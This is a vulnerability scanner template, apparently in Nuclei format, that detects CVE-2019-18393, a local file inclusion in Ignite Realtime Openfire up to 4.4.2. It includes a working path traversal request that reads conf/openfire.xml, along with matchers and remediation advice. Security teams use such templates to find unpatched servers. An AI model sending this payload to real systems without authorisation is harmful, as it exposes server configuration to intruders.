id: CVE-2019-18393 info: name: Ignite Realtime Openfire <4.42 - Local File Inclusion author: pikpikcu severity: medium description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory. remediation: | Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability. reference: - https://github.com/igniterealtime/Openfire/pull/1498 - https://swarm.ptsecurity.com/openfire-admin-console/ - https://nvd.nist.gov/vuln/detail/CVE-2019-18393 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 epss-percentile: 0.5258 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime product: openfire tags: cve,cve2019,openfire,lfi http: - method: GET path: - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml' matchers-condition: and matchers: - type: word part: body words: - "org.jivesoftware.database.EmbeddedConnectionProvider" - "Most properties are stored in the Openfire database" - type: status status: - 200 # digest: 4a0a00473045022100d97231f01bdd72c550f4d004e961d8a65fba2c22a8e6534333109a9a3c4bd55802207a0eb452d22d2519cde01c3eacc650a906c0fa16a4f2be26378e879bffd05040:922c64590222798bb761d5b6d8e72950